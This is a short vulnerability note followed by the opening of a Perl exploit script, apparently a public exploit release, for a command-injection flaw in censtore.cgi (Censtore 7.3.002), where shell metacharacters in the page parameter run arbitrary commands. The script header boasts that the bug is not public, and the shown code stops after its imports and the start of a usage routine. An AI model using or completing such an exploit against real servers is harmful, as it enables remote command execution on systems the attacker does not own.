censtore.cgi in Censtore 7.3.002 and previous versions allows remote malicious users to execute arbitrary commands via shell metacharacters in the page parameter.
#!/usr/bin/perl
#
# Censtorecgi exploit by FOX_MULDER (fox_mulder@abvbg)
#
# Vulnerability foud by FOX_MULDER
#
# This is the first exploit i release and the bug is not public so enjoy
# Ask censtorecom/ what they think about it !!!
#
###########################
use IO::Socket;
use LWP::Simple;
sub Usage {
print STDERR "\nFOX_M ...